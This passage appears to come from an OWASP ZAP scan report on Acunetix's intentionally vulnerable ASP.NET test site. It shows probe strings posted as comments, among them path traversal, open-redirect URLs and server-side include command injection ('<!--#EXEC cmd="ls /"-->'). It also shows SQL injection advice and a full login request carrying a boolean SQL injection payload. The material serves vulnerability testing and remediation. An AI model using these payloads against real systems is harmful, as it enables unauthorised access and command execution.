          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:58 PM</DIV><DIV class="CommentText"> AND 1=1 -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          id
          Attack
          4-2
          Solution

          Do not trust client side input, even if there is client side validation in place.

          In general, type check all data on the server side.

          If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

          If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

          If database Stored Procedures can be used, use them.

          Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

          Do not create dynamic SQL queries using simple string concatenation.

          Escape all data received from the client.

          Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

          Apply the principle of least privilege by using the least privileged database user possible.

          In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

          Grant the minimum database access that is necessary for the application.

        2. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          SQL injection may be possible.

          Other info

          The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' OR '1'='1' -- ]

          The parameter value being modified was stripped from the HTML output for the purposes of the comparison

          Data was NOT returned for the original parameter.

          The vulnerability was detected by successfully retrieving more data than originally returned, by manipulating the parameter

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1226
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1226 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP%27+AND+%271%27%3D%271%27+--+&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:08:04 GMT
          Content-Length: 13298
          
          
          Response body (13298 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP' AND '1'='1' -- " id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a 